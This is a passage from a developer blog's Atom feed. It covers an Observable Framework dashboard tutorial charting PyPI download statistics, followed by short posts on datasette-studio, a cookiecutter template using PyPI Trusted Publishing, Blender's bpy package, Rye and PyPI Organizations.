  value&lt;span class="pl-k"&gt;:&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;sqlite-utils&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;,
  label&lt;span class="pl-k"&gt;:&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;Package&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
}));
&lt;span class="pl-s"&gt;```&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;This block displays the select widget allowing the user to pick one of the items from the &lt;code&gt;packages&lt;/code&gt; array (defined later on).&lt;/p&gt;
&lt;p&gt;&lt;code&gt;Inputs.select()&lt;/code&gt; is a built-in method provided by Framework, described in the &lt;a href="https://observablehq.com/framework/lib/inputs"&gt;Observable Inputs&lt;/a&gt; documentation.&lt;/p&gt;
&lt;p&gt;The &lt;code&gt;view()&lt;/code&gt; function is new in Observable Framework - it's the thing that enables the reactivity, ensuring that updates to the input selection are acted on by other code blocks in the document.&lt;/p&gt;
&lt;p&gt;Because &lt;code&gt;packageName&lt;/code&gt; is defined with &lt;code&gt;const&lt;/code&gt; it becomes a variable that is visible to other &lt;code&gt;js&lt;/code&gt; blocks on the page. It's used by this next block:&lt;/p&gt;
&lt;div class="highlight highlight-text-md"&gt;&lt;pre&gt;&lt;span class="pl-s"&gt;```&lt;/span&gt;&lt;span class="pl-en"&gt;js&lt;/span&gt; echo
&lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-c1"&gt;data&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; &lt;span class="pl-smi"&gt;d3&lt;/span&gt;.&lt;span class="pl-en"&gt;json&lt;/span&gt;(
  &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;`&lt;/span&gt;https://datasette.io/content/stats.json?_size=max&amp;amp;package=&lt;span class="pl-s1"&gt;&lt;span class="pl-pse"&gt;${&lt;/span&gt;packageName&lt;span class="pl-pse"&gt;}&lt;/span&gt;&lt;/span&gt;&amp;amp;_sort_desc=date&amp;amp;_shape=array&lt;span class="pl-pds"&gt;`&lt;/span&gt;&lt;/span&gt;
);&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Here we are fetching the data that we need for the chart. I'm using &lt;code&gt;d3.json()&lt;/code&gt; (all of D3 is available in Framework) to fetch the data from a URL that includes the selected package name.&lt;/p&gt;
&lt;p&gt;The data is coming from &lt;a href="https://datasette.io/"&gt;Datasette&lt;/a&gt;, using the Datasette JSON API. I have a SQLite table at &lt;a href="https://datasette.io/content/stats"&gt;datasette.io/content/stats&lt;/a&gt; that's updated once a day with the latest PyPI package statistics via a convoluted series of GitHub Actions workflows, &lt;a href="https://simonwillison.net/2021/Jul/28/baked-data/#baked-data-datasette-io"&gt;described previously&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Adding &lt;code&gt;.json&lt;/code&gt; to that URL returns the JSON, then I ask for rows for that particular package, sorted descending by date and returning the maximum number of rows (1,000) as a JSON array of objects.&lt;/p&gt;
&lt;p&gt;Now that we have &lt;code&gt;data&lt;/code&gt; as a variable we can manipulate it slightly for use with Observable Plot - parsing the SQLite string dates into JavaScript &lt;code&gt;Date&lt;/code&gt; objects:&lt;/p&gt;
&lt;div class="highlight highlight-text-md"&gt;&lt;pre&gt;&lt;span class="pl-s"&gt;```&lt;/span&gt;&lt;span class="pl-en"&gt;js&lt;/span&gt; echo
&lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-c1"&gt;data_with_dates&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; &lt;span class="pl-smi"&gt;data&lt;/span&gt;.&lt;span class="pl-en"&gt;map&lt;/span&gt;(&lt;span class="pl-k"&gt;function&lt;/span&gt;(&lt;span class="pl-smi"&gt;d&lt;/span&gt;) {
  d.date = d3.&lt;span class="pl-en"&gt;timeParse&lt;/span&gt;(&lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;%Y-%m-%d&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;)(d.date);
  return d;
})
```&lt;/pre&gt;&lt;/div&gt;
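&lt;p&gt;As an aside, here's roughly what that &lt;code&gt;d3.timeParse("%Y-%m-%d")&lt;/code&gt; step does, sketched in plain JavaScript (illustrative only - the real code uses d3, whose parser also returns &lt;code&gt;null&lt;/code&gt; for strings that don't match the format):&lt;/p&gt;

```javascript
// Rough plain-JavaScript equivalent of d3.timeParse("%Y-%m-%d"):
// parse a "YYYY-MM-DD" string into a local-time Date object.
function parseDay(s) {
  const m = /^(\d{4})-(\d{2})-(\d{2})$/.exec(s);
  if (!m) return null; // non-matching input, like d3's parser
  // Month is zero-indexed in the Date constructor
  return new Date(Number(m[1]), Number(m[2]) - 1, Number(m[3]));
}

// Hypothetical row shaped like the Datasette stats data
const rows = [{date: "2024-02-20", downloads: 4128}];
const rowsWithDates = rows.map((d) => ({...d, date: parseDay(d.date)}));

console.log(rowsWithDates[0].date.getFullYear()); // 2024
```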
&lt;p&gt;This code is ready to render as a chart. I'm using &lt;a href="https://observablehq.com/plot"&gt;Observable Plot&lt;/a&gt; - also packaged with Framework:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;```js echo
Plot.plot({
  y: {
    grid: true,
    label: `${packageName} PyPI downloads per day`
  },
  width: width,
  marginLeft: 60,
  marks: [
    Plot.line(data_with_dates, {
      x: "date",
      y: "downloads",
      title: "downloads",
      tip: true
    })
  ]
})
```
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So we have one cell that lets the user pick the package they want, a cell that fetches that data, a cell that processes it and a cell that renders it as a chart.&lt;/p&gt;
&lt;p&gt;There's one more piece of the puzzle: where does that list of packages come from? I fetch that with another API call to Datasette. Here I'm using a SQL query executed against the &lt;a href="https://datasette.io/content"&gt;/content&lt;/a&gt; database directly:&lt;/p&gt;
&lt;div class="highlight highlight-text-md"&gt;&lt;pre&gt;&lt;span class="pl-s"&gt;```&lt;/span&gt;&lt;span class="pl-en"&gt;js&lt;/span&gt; echo
&lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-c1"&gt;packages_sql&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;"&lt;/span&gt;select package from stats group by package order by max(downloads) desc&lt;span class="pl-pds"&gt;"&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;```&lt;/span&gt;
&lt;span class="pl-s"&gt;```&lt;/span&gt;&lt;span class="pl-en"&gt;js&lt;/span&gt; echo
&lt;span class="pl-k"&gt;const&lt;/span&gt; &lt;span class="pl-c1"&gt;packages&lt;/span&gt; &lt;span class="pl-k"&gt;=&lt;/span&gt; &lt;span class="pl-en"&gt;fetch&lt;/span&gt;(
  &lt;span class="pl-s"&gt;&lt;span class="pl-pds"&gt;`&lt;/span&gt;https://datasette.io/content.json?sql=&lt;span class="pl-s1"&gt;&lt;span class="pl-pse"&gt;${&lt;/span&gt;&lt;span class="pl-c1"&gt;encodeURIComponent&lt;/span&gt;(&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;span class="pl-s1"&gt;    packages_sql&lt;/span&gt;&lt;/span&gt;
&lt;span class="pl-s"&gt;&lt;span class="pl-s1"&gt;  )&lt;span class="pl-pse"&gt;}&lt;/span&gt;&lt;/span&gt;&amp;amp;_size=max&amp;amp;_shape=arrayfirst&lt;span class="pl-pds"&gt;`&lt;/span&gt;&lt;/span&gt;
).&lt;span class="pl-c1"&gt;then&lt;/span&gt;((&lt;span class="pl-smi"&gt;r&lt;/span&gt;) &lt;span class="pl-k"&gt;=&amp;gt;&lt;/span&gt; &lt;span class="pl-smi"&gt;r&lt;/span&gt;.&lt;span class="pl-en"&gt;json&lt;/span&gt;());
&lt;span class="pl-s"&gt;```&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;code&gt;_shape=arrayfirst&lt;/code&gt; is a shortcut for getting back a JSON array of the first column of the resulting rows.&lt;/p&gt;
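&lt;p&gt;To make the URL construction concrete, here's that same encoding step as standalone JavaScript (plain Node.js, outside Framework - &lt;code&gt;encodeURIComponent()&lt;/code&gt; percent-encodes the SQL so it's safe in a querystring):&lt;/p&gt;

```javascript
// Assemble the Datasette JSON API URL used above: the SQL query is
// percent-encoded into the sql= parameter.
const packages_sql =
  "select package from stats group by package order by max(downloads) desc";

const url = `https://datasette.io/content.json?sql=${encodeURIComponent(
  packages_sql
)}&_size=max&_shape=arrayfirst`;

console.log(url);
```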
&lt;p&gt;That's all there is to it! It's a pretty tiny amount of code for a full interactive dashboard.&lt;/p&gt;
&lt;h4 id="only-code-you-use"&gt;Only include the code that you use&lt;/h4&gt;
&lt;p&gt;You may have noticed that my dashboard example uses several additional libraries - &lt;code&gt;Inputs&lt;/code&gt; for the form element, &lt;code&gt;d3&lt;/code&gt; for the data fetching and &lt;code&gt;Plot&lt;/code&gt; for the chart rendering.&lt;/p&gt;
&lt;p&gt;Observable Framework is smart about these. It implements lazy loading in development mode, so code is only loaded the first time you attempt to use it in a cell.&lt;/p&gt;
&lt;p&gt;When you build and deploy your application, Framework automatically loads just the referenced library code from the &lt;a href="https://www.jsdelivr.com/"&gt;jsdelivr CDN&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="cache-data-at-build"&gt;Cache your data at build time&lt;/h4&gt;
&lt;p&gt;One of the most interesting features of Framework is its &lt;a href="https://observablehq.com/framework/loaders"&gt;Data loader&lt;/a&gt; mechanism.&lt;/p&gt;
&lt;p&gt;Dashboards built using Framework can load data at runtime from anywhere using &lt;code&gt;fetch()&lt;/code&gt; requests (or wrappers around them). This is how Observable Notebooks work too, but it leaves the performance of your dashboard at the mercy of whatever backends you are talking to.&lt;/p&gt;
&lt;p&gt;Dashboards benefit from fast loading times. Framework encourages a pattern where you build the data for the dashboard at deploy time, bundling it together into static files containing just the subset of the data needed for the dashboard. These can be served lightning fast from the same static hosting as the dashboard code itself.&lt;/p&gt;
&lt;p&gt;The design of the data loaders is beautifully simple and powerful. A data loader is a script that can be written in &lt;em&gt;any&lt;/em&gt; programming language. At build time, Framework executes that script and saves whatever it outputs to a file.&lt;/p&gt;
&lt;p&gt;A data loader can be as simple as the following, saved as &lt;code&gt;quakes.json.sh&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;curl https://earthquake.usgs.gov/earthquakes/feed/v1.0/summary/all_day.geojson&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When the application is built, that filename tells Framework the destination file (&lt;code&gt;quakes.json&lt;/code&gt;) and the loader to execute (&lt;code&gt;.sh&lt;/code&gt;).&lt;/p&gt;
&lt;p&gt;This means you can load data from any source using any technology you like, provided it has the ability to output JSON or CSV or some other useful format to standard output.&lt;/p&gt;
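&lt;p&gt;Loaders aren't limited to shell scripts. As a sketch, here's what a Node.js loader might look like, saved as something like &lt;code&gt;top-packages.json.js&lt;/code&gt; (the filename and inlined data here are invented for illustration - a real loader would fetch or compute its data):&lt;/p&gt;

```javascript
// Hypothetical data loader: at build time Framework runs this script and
// captures its standard output into top-packages.json.
// (Illustrative only - the rows are hard-coded rather than fetched.)
const rows = [
  {package: "datasette", downloads: 4128},
  {package: "sqlite-utils", downloads: 3921},
];

// Whatever the script writes to stdout becomes the cached static file.
const output = JSON.stringify(rows, null, 2);
process.stdout.write(output);
```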
&lt;h4 id="comparison-to-observable-notebooks"&gt;Comparison to Observable Notebooks&lt;/h4&gt;
&lt;p&gt;Mike introduced Observable Framework as &lt;em&gt;Observable 2.0&lt;/em&gt;. It's worth reviewing how this system compares to the original Observable Notebook platform.&lt;/p&gt;
&lt;p&gt;I've been a huge fan of Observable Notebooks for years - &lt;a href="https://simonwillison.net/tags/observable/"&gt;38 blog posts and counting&lt;/a&gt;! The most obvious comparison is to Jupyter Notebooks, where they have some key differences:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Observable notebooks use JavaScript, not Python.&lt;/li&gt;
&lt;li&gt;The notebook editor itself isn't open source - it's a hosted product provided on &lt;a href="https://observablehq.com/"&gt;observablehq.com&lt;/a&gt;. You can export the notebooks as static files and run them anywhere you like, but the editor itself is a proprietary product.&lt;/li&gt;
&lt;li&gt;Observable cells are &lt;em&gt;reactive&lt;/em&gt;. This is the key difference from Jupyter: any time you change a cell, all other cells that depend on that cell are automatically re-evaluated, similar to Excel.&lt;/li&gt;
&lt;li&gt;The JavaScript syntax they use isn't quite standard JavaScript - they had to invent a new &lt;code&gt;viewof&lt;/code&gt; keyword to support their reactivity model.&lt;/li&gt;
&lt;li&gt;Editable notebooks are a pretty complex proprietary file format. They don't play well with tools like Git, to the point that Observable ended up implementing their own custom version control and collaboration systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Observable Framework reuses many of the ideas (and code) from Observable Notebooks, but with some crucial differences:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Notebooks (really documents) are now &lt;strong&gt;single text files&lt;/strong&gt; - Markdown files with embedded JavaScript blocks. It's all still reactive, but the file format is much simpler and can be edited using any text editor, and checked into Git.&lt;/li&gt;
&lt;li&gt;It's &lt;strong&gt;all open source&lt;/strong&gt;. Everything is under an ISC license (OSI approved) and you can run the full editing stack on your own machine.&lt;/li&gt;
&lt;li&gt;It's all just standard JavaScript now - &lt;strong&gt;no custom syntax&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 id="change-in-strategy"&gt;A change in strategy&lt;/h4&gt;
&lt;p&gt;Reading the tea leaves a bit, this also looks to me like a strategic change of direction for Observable as a company. Their previous focus was on building great collaboration tools for data science and analytics teams, based around the proprietary Observable Notebook editor.&lt;/p&gt;
&lt;p&gt;With Framework they appear to be leaning more into the developer tools space.&lt;/p&gt;
&lt;p&gt;On Twitter &lt;a href="http://twitter.com/observablehq"&gt;@observablehq&lt;/a&gt; describes itself as "The end-to-end solution for developers who want to build and host dashboards that don’t suck" - the Internet Archive copy &lt;a href="https://web.archive.org/web/20231003212202/https://twitter.com/observablehq"&gt;from October 3rd 2023&lt;/a&gt; showed "Build data visualizations, dashboards, and data apps that impact your business — faster."&lt;/p&gt;
&lt;p&gt;I'm excited to see where this goes. I've limited my usage of Observable Notebooks a little in the past purely due to the proprietary nature of their platform and the limitations placed on free accounts (mainly the lack of free private notebooks), while still having enormous respect for the technology and enthusiastically adopting their open source libraries such as &lt;a href="https://observablehq.com/plot/"&gt;Observable Plot&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Observable Framework addresses basically all of my reservations. It's a fantastic new expression of the ideas that made Observable Notebooks so compelling, and I expect to use it for all sorts of interesting projects in the future.&lt;/p&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/d3"&gt;d3&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/jupyter"&gt;jupyter&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/observable"&gt;observable&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/mike-bostock"&gt;mike-bostock&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/observable-framework"&gt;observable-framework&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/observable-plot"&gt;observable-plot&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="javascript"/><category term="open-source"/><category term="pypi"/><category term="d3"/><category term="jupyter"/><category term="observable"/><category term="mike-bostock"/><category term="observable-framework"/><category term="observable-plot"/></entry><entry><title>datasette-studio</title><link href="https://simonwillison.net/2024/Feb/18/datasette-studio/#atom-tag" rel="alternate"/><published>2024-02-18T20:38:08+00:00</published><updated>2024-02-18T20:38:08+00:00</updated><id>https://simonwillison.net/2024/Feb/18/datasette-studio/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/datasette/datasette-studio"&gt;datasette-studio&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
I've been thinking for a while that it might be interesting to have a version of Datasette that comes bundled with a set of useful plugins, aimed at expanding Datasette's default functionality to cover things like importing data and editing schemas.&lt;/p&gt;
&lt;p&gt;This morning I built the very first experimental preview of what that could look like. Install it using &lt;code&gt;pipx&lt;/code&gt;:&lt;/p&gt;
&lt;p&gt;&lt;code&gt;pipx install datasette-studio&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I recommend pipx because it will ensure &lt;code&gt;datasette-studio&lt;/code&gt; gets its own isolated environment, independent of any other Datasette installations you might have.&lt;/p&gt;
&lt;p&gt;Now running &lt;code&gt;datasette-studio&lt;/code&gt; instead of &lt;code&gt;datasette&lt;/code&gt; will get you the version with the bundled plugins.&lt;/p&gt;
&lt;p&gt;The implementation of this is fun - it's a single &lt;a href="https://github.com/datasette/datasette-studio/blob/main/pyproject.toml"&gt;pyproject.toml file&lt;/a&gt; defining the dependencies and setting up the &lt;code&gt;datasette-studio&lt;/code&gt; CLI hook, which is enough to provide the full set of functionality.&lt;/p&gt;
&lt;p&gt;Is this a good idea? I don't know yet, but it's certainly an interesting initial experiment.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/cli"&gt;cli&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/plugins"&gt;plugins&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/datasette"&gt;datasette&lt;/a&gt;&lt;/p&gt;



</summary><category term="cli"/><category term="plugins"/><category term="projects"/><category term="pypi"/><category term="python"/><category term="datasette"/></entry><entry><title>Publish Python packages to PyPI with a python-lib cookiecutter template and GitHub Actions</title><link href="https://simonwillison.net/2024/Jan/16/python-lib-pypi/#atom-tag" rel="alternate"/><published>2024-01-16T21:59:56+00:00</published><updated>2024-01-16T21:59:56+00:00</updated><id>https://simonwillison.net/2024/Jan/16/python-lib-pypi/#atom-tag</id><summary type="html">
    &lt;p&gt;I use &lt;a href="https://github.com/cookiecutter/cookiecutter"&gt;cookiecutter&lt;/a&gt; to start almost all of my Python projects. It helps me quickly generate a skeleton of a project with my preferred directory structure and configured tools.&lt;/p&gt;
&lt;p&gt;I made some major upgrades to my &lt;a href="https://github.com/simonw/python-lib"&gt;python-lib&lt;/a&gt; cookiecutter template today. Here's what it can now do to help you get started with a new Python library:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Create a &lt;code&gt;pyproject.toml&lt;/code&gt; file configured for use with &lt;code&gt;setuptools&lt;/code&gt;. In my opinion this is the pattern with the current lowest learning curve - I wrote about that &lt;a href="https://til.simonwillison.net/python/pyproject"&gt;in detail in this TIL&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;Add a skeleton &lt;code&gt;README&lt;/code&gt; and an Apache 2.0 &lt;code&gt;LICENSE&lt;/code&gt; file.&lt;/li&gt;
&lt;li&gt;Create &lt;code&gt;your_package/__init__.py&lt;/code&gt; for your code to go in.&lt;/li&gt;
&lt;li&gt;Create &lt;code&gt;tests/test_your_package.py&lt;/code&gt; with a skeleton test.&lt;/li&gt;
&lt;li&gt;Include &lt;code&gt;pytest&lt;/code&gt; as a test dependency.&lt;/li&gt;
&lt;li&gt;Configure GitHub Actions with two workflows in &lt;code&gt;.github/workflows&lt;/code&gt; - one for running the tests against Python 3.8 through 3.12, and one for publishing releases of your package to PyPI.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The changes I made today are that I switched from &lt;code&gt;setup.py&lt;/code&gt; to &lt;code&gt;pyproject.toml&lt;/code&gt;, and I made a big improvement to how the publishing workflow authenticates with PyPI.&lt;/p&gt;
&lt;h4 id="pypi-trusted-publishing"&gt;Publishing to PyPI with Trusted Publishing&lt;/h4&gt;
&lt;p&gt;My previous version of this template required you to jump through &lt;a href="https://github.com/simonw/python-lib/blob/c28bd8cf822455fd464c253daf4ef4b430758588/README.md#publishing-your-library-as-a-package-to-pypi"&gt;quite a few hoops&lt;/a&gt; to get PyPI publishing to work. You needed to create a PyPI token that could publish a new package, then paste that token into a GitHub Actions secret, then publish the package, and then disable that token and create a new one dedicated to just updating this package in the future.&lt;/p&gt;
&lt;p&gt;The new version is much simpler, thanks to PyPI's relatively new &lt;a href="https://docs.pypi.org/trusted-publishers/"&gt;Trusted Publishers&lt;/a&gt; mechanism.&lt;/p&gt;
&lt;p&gt;To publish a new package, you need to sign into PyPI and &lt;a href="https://pypi.org/manage/account/publishing/"&gt;create a new "pending publisher"&lt;/a&gt;. Effectively you tell PyPI "My GitHub repository &lt;code&gt;myname/name-of-repo&lt;/code&gt; should be allowed to publish packages with the name &lt;code&gt;name-of-package&lt;/code&gt;".&lt;/p&gt;
&lt;p&gt;Here's that form for my brand new &lt;a href="https://github.com/datasette/datasette-test"&gt;datasette-test&lt;/a&gt; library, the first library I published using this updated template:&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2024/datasette-test.png" alt="Screenshot of the create pending publisher form on PyPI. PyPI Project Name is set to datasette-test. Owner is set to datasette. Repository name is datasette-test. Workflow name is publish.yml. Environment name is release." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;Then create a release on GitHub, with a name that matches the version number from your &lt;code&gt;pyproject.toml&lt;/code&gt;. Everything else should Just Work.&lt;/p&gt;
&lt;p&gt;I wrote &lt;a href="https://til.simonwillison.net/pypi/pypi-releases-from-github"&gt;more about Trusted Publishing in this TIL&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="github-repository-template"&gt;Creating a package using a GitHub repository template&lt;/h4&gt;
&lt;p&gt;The &lt;a href="https://github.com/simonw/python-lib/issues/6"&gt;most time consuming part&lt;/a&gt; of this project was getting my GitHub repository template to work properly.&lt;/p&gt;
&lt;p&gt;There are two ways to use my cookiecutter template. You can use the cookiecutter command-line tool like this:&lt;/p&gt;
&lt;div class="highlight highlight-source-shell"&gt;&lt;pre&gt;pipx install cookiecutter
cookiecutter gh:simonw/python-lib
&lt;span class="pl-c"&gt;&lt;span class="pl-c"&gt;#&lt;/span&gt; Answer a few questions here&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;But a more fun and convenient option is to use my GitHub repository template, &lt;a href="https://github.com/simonw/python-lib-template-repository"&gt;simonw/python-lib-template-repository&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;This lets you &lt;a href="https://github.com/new?template_name=python-lib-template-repository&amp;amp;template_owner=simonw"&gt;fill in a form&lt;/a&gt; on GitHub to create a new repository which will then execute the cookiecutter template for you and update itself with the result.&lt;/p&gt;
&lt;p&gt;&lt;img src="https://static.simonwillison.net/static/2024/template-repo-create.jpg" alt="Create a new repository form. I'm using the python-lib-template-repository template, and it asks for my repository name (my-new-python-library) and description." style="max-width: 100%;" /&gt;&lt;/p&gt;
&lt;p&gt;You can see an example of a repository created using this template at &lt;a href="https://github.com/datasette/datasette-test/tree/8d5f8262dc3a88f3c6d97f0cef3b55264cabc695"&gt;datasette/datasette-test&lt;/a&gt;.&lt;/p&gt;
&lt;h4 id="adding-it-all-together"&gt;Adding it all together&lt;/h4&gt;
&lt;p&gt;There are quite a lot of moving parts behind the scenes here, but the end result is that anyone can now create a Python library with test coverage, GitHub CI and release automation by filling in a couple of forms and clicking some buttons.&lt;/p&gt;
&lt;p&gt;For more details on how this all works, and how it's evolved over time:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2020/Jun/20/cookiecutter-plugins/"&gt;A cookiecutter template for writing Datasette plugins&lt;/a&gt; from June 2020 describes my first experiments with cookiecutter&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2021/Aug/28/dynamic-github-repository-templates/"&gt;Dynamic content for GitHub repository templates using cookiecutter and GitHub Actions&lt;/a&gt; from August 2021 describes my earliest attempts at using GitHub repository templates for this&lt;/li&gt;
&lt;li&gt;
&lt;a href="https://simonwillison.net/2021/Nov/4/publish-open-source-python-library/"&gt;How to build, test and publish an open source Python library&lt;/a&gt; is a ten minute talk I gave at PyGotham in November 2021. It describes &lt;code&gt;setup.py&lt;/code&gt; in detail, which is no longer my preferred approach.&lt;/li&gt;
&lt;/ul&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/github"&gt;github&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/projects"&gt;projects&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/github-actions"&gt;github-actions&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/cookiecutter"&gt;cookiecutter&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="github"/><category term="projects"/><category term="pypi"/><category term="python"/><category term="github-actions"/><category term="cookiecutter"/></entry><entry><title>bpy - Blender on PyPI</title><link href="https://simonwillison.net/2023/Sep/8/blender-on-pypi/#atom-tag" rel="alternate"/><published>2023-09-08T15:29:10+00:00</published><updated>2023-09-08T15:29:10+00:00</updated><id>https://simonwillison.net/2023/Sep/8/blender-on-pypi/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://pypi.org/project/bpy/"&gt;bpy - Blender on PyPI&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
TIL you can “pip install” Blender!&lt;/p&gt;

&lt;p&gt;bpy “provides Blender as a Python module”—it’s part of the official Blender project, and ships with binary wheels ranging in size from 168MB to 319MB depending on your platform.&lt;/p&gt;

&lt;p&gt;It only supports the version of Python used by the current Blender release though—right now that’s Python 3.10.

    &lt;p&gt;&lt;small&gt;Via &lt;a href="https://twitter.com/kolibril13/status/1699790198505353259"&gt;@kolibril13&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/blender"&gt;blender&lt;/a&gt;&lt;/p&gt;



</summary><category term="pypi"/><category term="python"/><category term="blender"/></entry><entry><title>Rye</title><link href="https://simonwillison.net/2023/Apr/24/rye/#atom-tag" rel="alternate"/><published>2023-04-24T04:02:42+00:00</published><updated>2023-04-24T04:02:42+00:00</updated><id>https://simonwillison.net/2023/Apr/24/rye/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://github.com/mitsuhiko/rye"&gt;Rye&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Armin Ronacher's take on a Python packaging tool. There are a lot of interesting ideas in this one - it's written in Rust, configured using &lt;code&gt;pyproject.toml&lt;/code&gt; and has some very strong opinions, including completely hiding &lt;code&gt;pip&lt;/code&gt; from view and insisting you use &lt;code&gt;rye add package&lt;/code&gt; instead. Notably, it doesn't use the system Python at all: instead, it downloads a pre-compiled standalone Python from Gregory Szorc's &lt;a href="https://github.com/indygreg/python-build-standalone"&gt;python-build-standalone&lt;/a&gt; project - the same approach I used for the Datasette Desktop Electron app.&lt;/p&gt;
&lt;p&gt;Armin warns that this is just an exploration, with no guarantees of future maintenance - and even has an issue open titled &lt;a href="https://github.com/mitsuhiko/rye/discussions/6"&gt;Should Rye exist?&lt;/a&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/armin-ronacher"&gt;armin-ronacher&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/rust"&gt;rust&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/rye"&gt;rye&lt;/a&gt;&lt;/p&gt;



</summary><category term="armin-ronacher"/><category term="packaging"/><category term="pypi"/><category term="python"/><category term="rust"/><category term="rye"/></entry><entry><title>Introducing PyPI Organizations</title><link href="https://simonwillison.net/2023/Apr/23/introducing-pypi-organizations/#atom-tag" rel="alternate"/><published>2023-04-23T20:29:39+00:00</published><updated>2023-04-23T20:29:39+00:00</updated><id>https://simonwillison.net/2023/Apr/23/introducing-pypi-organizations/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://blog.pypi.org/posts/2023-04-23-introducing-pypi-organizations/"&gt;Introducing PyPI Organizations&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Launched at PyCon US today: Organizations allow packages on the Python Package Index to be owned by a group, not an individual user account. “We’re making organizations available to community projects for free, forever, and to corporate projects for a small fee.”—this is the first revenue-generating PyPI feature.


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/packaging"&gt;packaging&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/pypi"&gt;pypi&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/python"&gt;python&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/psf"&gt;psf&lt;/a&gt;&lt;/p&gt;



